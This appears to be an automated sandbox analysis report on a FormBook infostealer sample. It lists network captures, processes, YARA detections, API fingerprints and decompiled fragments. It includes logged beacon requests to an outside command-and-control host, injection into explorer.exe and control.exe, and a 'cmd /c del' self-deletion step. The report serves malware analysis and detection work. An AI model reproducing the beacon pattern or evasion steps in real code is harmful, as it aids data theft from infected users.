Pragma: no-cache
Expires: Mon, 31 Dec 2001 7:32:00 GMT
Content-Length: 846
Connection: close
Content-Type: text/html; charset=UTF-8
Data Ascii: <html xmlns="http://www.w3.org/TR/REC-html40"> <head><title>sabaidiving.com</title><meta name="keywords" value=""/><meta name="description" content=""> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript">$(document).ready(function () { $('#main').attr('src', "/cf.php"); $('#main').css('visibility', 'visible');});/* if (parent.frames.length > 0) top.location.replace(document.location); */ </script> </head> <frameset rows="100%,*" frameborder="no" border="0" framespacing="0" id="frameset"><frame id="main" src="/cf.php"></frame><frame id="sub1" src="bh.php?dm=sabaidiving.com&kw=&tt=4d36d09bac3145dfbd0fe2ea9e6a7871&ty=false" style="visibility: hidden;"></frame> </frameset></html

Timestamp:May 12, 2021 15:48:35.250931025 CEST
kBytes transferred:6196
Direction:IN
Data Raw: 3e
Data Ascii: >


Session ID:9
Source IP:192.168.2.4
Source Port:49772
Destination IP:192.0.78.24
Destination Port:80
Process:C:\Windows\explorer.exe

Timestamp:May 12, 2021 15:48:40.409845114 CEST
kBytes transferred:6198
Direction:OUT
Data:
GET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1
Host: www.onemoresysadmin.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp:May 12, 2021 15:48:40.450537920 CEST
kBytes transferred:6198
Direction:IN
Data:
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 12 May 2021 13:48:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://www.onemoresysadmin.com/i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih
X-ac: 2.hhn _dca
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Memory Usage

                                                                  High Level Behavior Distribution

                                                                  Behavior

                                                                  System Behavior

                                                                  General

                                                                  Start time:15:46:42
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
                                                                  Imagebase:0xfb0000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:46
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x30000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:46
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x230000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:47
                                                                  Start date:12/05/2021
                                                                  Path:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
                                                                  Imagebase:0x8e0000
                                                                  File size:924672 bytes
                                                                  MD5 hash:350969BC82EC33AF12ACF100C41EB4D1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:15:46:49
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff6fee60000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:15:47:10
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\control.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\control.exe
                                                                  Imagebase:0x3c0000
                                                                  File size:114688 bytes
                                                                  MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:15:47:14
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
                                                                  Imagebase:0x11d0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:15:47:14
                                                                  Start date:12/05/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff724c50000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis


                                                                    Executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55df195301975a54411b3cd48df820dc3a00d9703ade706442f318eaed99b11f
                                                                    • Instruction ID: 5f0e90d51a6abb3e1168305008cf05c8550a236f4743bcc70c8b6fbb6cf8a3d4
                                                                    • Opcode Fuzzy Hash: 55df195301975a54411b3cd48df820dc3a00d9703ade706442f318eaed99b11f
                                                                    • Instruction Fuzzy Hash: D8B19870B006069FCB14EF79C494AAEBBF6FF88314B108A69C44ADB751DB34E905CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866BF8
                                                                    • GetCurrentThread.KERNEL32 ref: 01866C35
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866C72
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01866CCB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 789e9558747cc510eb3ade320b6af34e0ed13c6f5013bd4122d2c451782947cd
                                                                    • Instruction ID: a438cee47d2d139e9fbd06a31f7c7c9f67f72f70e830863be63de8d950575f74
                                                                    • Opcode Fuzzy Hash: 789e9558747cc510eb3ade320b6af34e0ed13c6f5013bd4122d2c451782947cd
                                                                    • Instruction Fuzzy Hash: DB5167B49006498FDB14DFAAD548BDEBBF0FF48314F2085A9E019A7360D7745948CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866BF8
                                                                    • GetCurrentThread.KERNEL32 ref: 01866C35
                                                                    • GetCurrentProcess.KERNEL32 ref: 01866C72
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01866CCB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: 250869cd7759e4fe49cd9c563e1f6719f04a343a18aab39a32e8f807676daef6
                                                                    • Instruction ID: ead330e4498871490377f45e65d92c4414a6e39d553a34c40baaea00004bae3d
                                                                    • Opcode Fuzzy Hash: 250869cd7759e4fe49cd9c563e1f6719f04a343a18aab39a32e8f807676daef6
                                                                    • Instruction Fuzzy Hash: 9B5176B49006498FDB14DFAAD5487DEBBF4FF48314F208469E019A3360DB74A988CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0186BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 8d7e48a01acf618366462179497e66c6fc9caa7bb9693ad8d32cbb80a117df87
                                                                    • Instruction ID: c3515236ccacb49ecbdbd21eed960ad61c0b83503372a725065b4138ae9615ee
                                                                    • Opcode Fuzzy Hash: 8d7e48a01acf618366462179497e66c6fc9caa7bb9693ad8d32cbb80a117df87
                                                                    • Instruction Fuzzy Hash: 67813570A00B058FD725DF2AD44175ABBF5FF88318F00892AD586DBA51DB35EA09CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0186DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 30884e6ee4bec2df26e2bda66178a38b11598d74a81e17b9fac77d102f4b47aa
                                                                    • Instruction ID: 41389f20e7d1609f59c56cafe8365d15be124fb19e170f0e05b9d5c36ba7e310
                                                                    • Opcode Fuzzy Hash: 30884e6ee4bec2df26e2bda66178a38b11598d74a81e17b9fac77d102f4b47aa
                                                                    • Instruction Fuzzy Hash: 4C51B0B1D00309DFDB15CFA9D980ADEBFB5BF48314F24862AE819AB210D7749945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0186DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 0d53701868848827be8d9f07ea457654a246d36636435b565f623eed78894063
                                                                    • Instruction ID: 5482a398842290a652c0af2a6edcac2439f419263d1efa39c96b00e45edb3724
                                                                    • Opcode Fuzzy Hash: 0d53701868848827be8d9f07ea457654a246d36636435b565f623eed78894063
                                                                    • Instruction Fuzzy Hash: 5441A0B1D00309EFDB15DF9AD884ADEBFB5BF48314F24862AE819AB210D7749945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01866E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 9f150d2c95089db5b18a90a5d0b294cebf78945649c5ce2bd0f1aa68cc2572c0
                                                                    • Instruction ID: 7af628332a267a91c10ff74c7f883c0d0ef787597ac935406ac40e24f31e64cc
                                                                    • Opcode Fuzzy Hash: 9f150d2c95089db5b18a90a5d0b294cebf78945649c5ce2bd0f1aa68cc2572c0
                                                                    • Instruction Fuzzy Hash: 3A415A75900249AFCB11CFA9D884ADEBFF9FB49310F18805AE944A7311D7359A14CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01866E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 005a3c4f60f2f1598feae47c87b1fbbd7739e8bb2015026c49be95786b809504
                                                                    • Instruction ID: 94513a8be74b9d59313110f629dbc5a23c9943cf5b09f344916d4d4dba8e5de9
                                                                    • Opcode Fuzzy Hash: 005a3c4f60f2f1598feae47c87b1fbbd7739e8bb2015026c49be95786b809504
                                                                    • Instruction Fuzzy Hash: 2A21D2B5901249DFDB10CFAAD984ADEBBF8FB48324F24851AE914B3310D375A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01866E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 70190ada28244521c99b8e1aa836104a092b7af29554da2fb56d5df482a62386
                                                                    • Instruction ID: 3c00e8d6bb7406ebf33e0aaf2de3be54217bc6417978d366eed8a86743d08a06
                                                                    • Opcode Fuzzy Hash: 70190ada28244521c99b8e1aa836104a092b7af29554da2fb56d5df482a62386
                                                                    • Instruction Fuzzy Hash: 2721C4B59012499FDB10CFAAD984ADEBBF8EB48324F14841AE914B3310D774A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0186BE89,00000800,00000000,00000000), ref: 0186C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: e725c6512427c7fcc76b5194df791d7da5b46c529f7b6ec5fd1d0fc403c075c5
                                                                    • Instruction ID: b7b4e35555ecc06f71d93d2907c5593a17de2781b35f7982af61c99183bceeea
                                                                    • Opcode Fuzzy Hash: e725c6512427c7fcc76b5194df791d7da5b46c529f7b6ec5fd1d0fc403c075c5
                                                                    • Instruction Fuzzy Hash: FB1114B69002099FDB14CF9AD444BDEFBF8EB49324F00842AD555B7700C775AA49CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0186BE89,00000800,00000000,00000000), ref: 0186C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: d2bacdbcb3d1d85d3cf2bf6d74efde72f47fc3e5baa5286c2068f542b8345a01
                                                                    • Instruction ID: db395bfe4a2b21a83b778e762c7e96f54bf30a1965bdbd7f8600b81ea0f121ec
                                                                    • Opcode Fuzzy Hash: d2bacdbcb3d1d85d3cf2bf6d74efde72f47fc3e5baa5286c2068f542b8345a01
                                                                    • Instruction Fuzzy Hash: D51133B6D002098FDB10CFAAC484BDEFBF8AB89314F10851AD515B7600C775A549CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0186BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 10142fa553ec54dd46796bee6cb1243e4c71760cfdcffe2495e9980646d7d751
                                                                    • Instruction ID: 07c2b5dce24ce2f2804884dc3feb6e153413eaedebbfe22d9c03db1b3637730d
                                                                    • Opcode Fuzzy Hash: 10142fa553ec54dd46796bee6cb1243e4c71760cfdcffe2495e9980646d7d751
                                                                    • Instruction Fuzzy Hash: B011E0B6D002498FDB14CF9AD844BDEFBF8EB88324F14851AD919B7610C378A645CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0186DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 49d6a618ae6f52dc42996f0745cab858fc950a8b47c02138bb13c1e8fa7ed91c
                                                                    • Instruction ID: 3708f24fdb09177ae79e3cf2d3ceda3507b8173581c07cae400c26c1feb64fca
                                                                    • Opcode Fuzzy Hash: 49d6a618ae6f52dc42996f0745cab858fc950a8b47c02138bb13c1e8fa7ed91c
                                                                    • Instruction Fuzzy Hash: DC11E2B59002099FDB10CF9AD585BDEBBF8EB48324F10851AE955B7700C374AA44CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?), ref: 0186DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 6b844f9d107b8cae1a7fd912adfd44298ddc88536562695bfb5fa01689ec0acf
                                                                    • Instruction ID: dcff13d32fc52a63d4747b1685f2bac26f9ba2acb68ef2647f56c4b5c376c330
                                                                    • Opcode Fuzzy Hash: 6b844f9d107b8cae1a7fd912adfd44298ddc88536562695bfb5fa01689ec0acf
                                                                    • Instruction Fuzzy Hash: C711E5BA900209CFDB10CF99D585BDEBBF8EB48324F15851AD555B7700C378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8639db580dfbb326b1fb18cceb924dfd566c4d72f529a4c4d9c0d2ada922f3d0
                                                                    • Instruction ID: e63b7c2f2ecbb2ebfb3d7d11400c0ab0ed0d3629f1d88760c8aab311825a83d3
                                                                    • Opcode Fuzzy Hash: 8639db580dfbb326b1fb18cceb924dfd566c4d72f529a4c4d9c0d2ada922f3d0
                                                                    • Instruction Fuzzy Hash: B85218B1501706CFD730CF5CE8C859DBBB1FB45328B914219D1A1ABA99D3B8678ACF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55b0af864bdfd3d4935051108cab77b075b7be0331c54578d0f722fe63264475
                                                                    • Instruction ID: 6f46cf6f5677eb2f1b89b4acff89c4bccc508e62c7d48d39c6085046957eb05d
                                                                    • Opcode Fuzzy Hash: 55b0af864bdfd3d4935051108cab77b075b7be0331c54578d0f722fe63264475
                                                                    • Instruction Fuzzy Hash: A6A17D32E0061A8FCF15DFA9C9445DEBBB6FF85304B15816AE905FB265EB31EA05CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84a268e5b349a82353e44db69ea0dc63a2ed8200f83e5e077727341b2facf84f
                                                                    • Instruction ID: 7f21be650e457134c0b6810fb1e8c6eab0ebd313cbd60f91fa4af6f300763ae6
                                                                    • Opcode Fuzzy Hash: 84a268e5b349a82353e44db69ea0dc63a2ed8200f83e5e077727341b2facf84f
                                                                    • Instruction Fuzzy Hash: 4B614970E0520A9FCB04CFA9D491AAEFBB6BB89354F14C025D624EB254D734DA41CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.662742422.0000000001860000.00000040.00000001.sdmp, Offset: 01860000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff23e90c109a398b4d3405808d1d278f2f49bd4b3a9d11f98dc165397914b373
                                                                    • Instruction ID: 37394627ae2a8a793bed25640ba5c66b661fba14f68ccc6d220090d314e2c8cf
                                                                    • Opcode Fuzzy Hash: ff23e90c109a398b4d3405808d1d278f2f49bd4b3a9d11f98dc165397914b373
                                                                    • Instruction Fuzzy Hash: 08614770E0520A9FCB04CFA9D491AAEFBF6BB89310F14C425D625EB255D734EA41CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    C-Code - Quality: 37%
                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                    				void* _t18;
                                                                    				void* _t27;
                                                                    				intOrPtr* _t28;
                                                                    
                                                                    				_t13 = _a4;
                                                                    				_t28 = _a4 + 0xc48;
                                                                    				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                    				_t6 =  &_a32; // 0x413d52
                                                                    				_t12 =  &_a8; // 0x413d52
                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                    				return _t18;
                                                                    			}

                                                                    Instruction addresses: 0x00418273, 0x0041827f, 0x00418287, 0x00418292, 0x004182ad, 0x004182b5, 0x004182b9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: R=A$R=A
                                                                    • API String ID: 2738559852-3742021989
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: c32f5796ddaf866f59db34fea60258a467219aa5b305847553aa14afb13a1566
